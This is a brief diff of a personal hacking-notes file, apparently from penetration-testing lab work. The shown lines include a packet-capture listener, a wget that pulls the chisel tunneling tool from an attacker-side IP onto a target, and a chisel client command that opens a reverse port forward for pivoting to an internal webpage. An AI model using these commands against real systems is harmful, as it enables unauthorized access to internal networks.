loomnugget/obsidian/hacking strategy.md

 sudo tcpdump -nvvvXi tun0 tcp port 8081 wget http://192.168.45.234/chisel -O chisel

-# access the internal webpage at 127.0.0.1:8001 - actually cannot access the webpage but the exploit will still work
+# access the internal webpage at 127.0.0.1:8001 - might not be able to access the webpage but the exploits will still work
 ./chisel
 # may need to set up chisel server using the target's open ports
 ./chisel client 192.168.45.160:80 R:60002:0.0.0.0:60002